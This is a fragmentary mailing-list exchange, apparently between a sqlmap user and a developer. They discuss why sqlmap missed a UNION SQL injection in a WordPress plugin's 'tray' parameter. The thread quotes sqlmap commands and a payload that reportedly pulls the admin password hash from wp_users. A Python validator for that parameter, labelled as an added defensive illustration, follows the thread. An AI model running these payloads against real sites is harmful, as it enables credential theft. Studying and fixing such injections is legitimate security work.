Yeah, no worries. Was just playing around with it and was surprised sqlmap
didn't find the UNION.
I think what is happening is sqlmap is changing up the value of tray during
the union tests to negative numbers, and it is required to be 'in_deleted'
(but hey, that's what --prefix is for)
Thanks!
Looking into traffic file I don't see "obvious" trails of SQLi. If you are
satisfied with your findings I won't look any further.
Bye
On Mon, Dec 15, 2014 at 6:55 PM, Brandon Perry wrote:
>
> Aha, I got it:
>
> bperry@ubuntu:~/tools/sqlmap$ ./sqlmap.py -r /tmp/req.req -o --dbms=mysql
> -p tray -
Sorry, one more thing to note, the following command gets very close to
exploiting the injection:
./sqlmap.py -r /tmp/req.req -o --dbms=mysql -p tray --flush-session -t
/tmp/traffic.txt --proxy=http://127.0.0.1:8080 --technique=u --suffix="
LIMIT 1,1#" --union-char=f --prefix='in_deleted '
The on
Aha, I got it:
bperry@ubuntu:~/tools/sqlmap$ ./sqlmap.py -r /tmp/req.req -o --dbms=mysql
-p tray --flush-session -t /tmp/traffic.txt --proxy=http://127.0.0.1:8080
--technique=u --suffix=" LIMIT 1,1#" --prefix='in_deleted ' --level=5
--risk=3 -o
{1.0-dev-180ede0}
Playing with the queries sqlmap sends a bit more:
action=getMailMessage&tray=in_deleted UNION ALL SELECT NULL#&mid=1
This results in a 0 being returned where the password hash was in the
successful injection:
1[split]0[split]in_deleted UNION ALL SELECT NULL#[split]
^ injection result
Hi.
I don't see a reason why this form of UNION test would be any different
than the regular used by sqlmap. Can you please send me the traffic file
for such run (... --flush-session -t traffic.txt) along with console
output?
Bye
On Dec 15, 2014 5:50 PM, "Brandon Perry" wrote:
> Hello!
>
> Play
Hello!
Playing around with the following vulnerability:
http://www.exploit-db.com/exploits/35505/
Using a payload such as 'action=getMailMessage&tray=in_deleted = 1 UNION
(SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- &mid=1' does
result in a response from the server with the hash o
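As an added defender-side illustration, not part of this thread or of sqlmap: the server-side check that the payloads above imply, rejecting any tray value outside an allowlist and reporting which SQL keywords or comment markers it carries. The sample bodies are constructed from the thread's payloads, and the allowlist entries other than in_deleted are assumed placeholders.

```python
import re
from urllib.parse import parse_qs

# Constructed sample POST bodies modelled on the ones quoted in the thread
# (one legitimate, two carrying injected SQL). Not captured traffic.
SAMPLE_BODIES = [
    "action=getMailMessage&tray=in_deleted&mid=1",
    "action=getMailMessage&tray=in_deleted UNION ALL SELECT NULL#&mid=1",
    "action=getMailMessage&tray=in_deleted = 1 UNION "
    "(SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- &mid=1",
]

# Allowlist of tray names. 'in_deleted' is the value the thread uses; the
# others are hypothetical placeholders for whatever the application defines.
ALLOWED_TRAYS = {"in_deleted", "in_inbox", "in_sent"}
SQL_TOKENS = re.compile(r"\b(UNION|SELECT|FROM|WHERE|LIMIT)\b|#|--", re.IGNORECASE)


def check_request(body):
    """Validate one getMailMessage request body.

    Returns a dict: ok (bool), tray (raw value), mid (raw value) and
    tokens (SQL keywords/comment markers found in tray, uppercased, sorted)."""
    params = parse_qs(body, keep_blank_values=True)
    tray = params.get("tray", [""])[0]
    mid = params.get("mid", [""])[0]
    tokens = sorted({m.group(0).upper() for m in SQL_TOKENS.finditer(tray)})
    # Exact allowlist match: a tray value with any trailing SQL is rejected
    # regardless of whether it starts with a valid name.
    ok = tray in ALLOWED_TRAYS and mid.isdigit()
    return {"ok": ok, "tray": tray, "mid": mid, "tokens": tokens}


def scan(bodies):
    """Run the check over many bodies; return only the rejected ones."""
    return [r for r in map(check_request, bodies) if not r["ok"]]


if __name__ == "__main__":
    for hit in scan(SAMPLE_BODIES):
        print("rejected tray=%r tokens=%s" % (hit["tray"], hit["tokens"]))
```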